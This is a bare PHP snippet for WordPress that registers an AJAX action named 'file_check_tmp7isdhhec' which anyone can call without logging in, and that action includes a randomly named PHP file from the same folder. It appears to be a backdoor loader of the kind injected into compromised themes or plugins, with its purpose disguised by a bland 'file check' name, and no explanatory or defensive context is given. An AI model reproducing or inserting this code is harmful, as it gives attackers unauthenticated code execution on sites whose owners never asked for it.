if(!function_exists('file_check_tmp7isdhhec')){ add_action('wp_ajax_nopriv_file_check_tmp7isdhhec', 'file_check_tmp7isdhhec'); add_action('wp_ajax_file_check_tmp7isdhhec', 'file_check_tmp7isdhhec'); function file_check_tmp7isdhhec() { $file = __DIR__ . '/' . 'tmp7isdhhec.php'; if (file_exists($file)) { include $file; } die(); } }